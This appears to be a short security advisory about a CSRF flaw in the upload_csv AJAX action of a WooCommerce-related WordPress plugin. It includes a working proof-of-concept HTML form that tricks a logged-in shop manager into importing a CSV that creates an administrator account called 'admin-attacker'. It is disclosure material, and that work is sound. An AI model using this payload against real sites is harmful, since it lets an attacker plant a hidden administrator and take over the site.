The fixes for https://wpscan.com/vulnerability/126143e0-b0cc-4517-862e-3ac557db744f still allowed the issue to be performed via a CSRF attack. The upload_csv AJAX action, available to authenticated users, did not have proper CRSF check, allowing attacker to make a logged in user with the manage_woocommerce capability, to call it and import arbitrary users and could lead to new administrator accounts being created.
<html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="action" value="upload_csv" /> <input type="hidden" name="send-notification-email" value="no" /> <input type="hidden" name="csv" value='ID","Password","Role","Login","Email"<#>"","Passw0rd","administrator","admin-attacker","[email protected]"' /> <input type="submit" value="Submit request" /> </form> </body> </html>
2021-03-30 (about 1 years ago)
2021-03-30 (about 1 years ago)
2021-04-09 (about 1 years ago)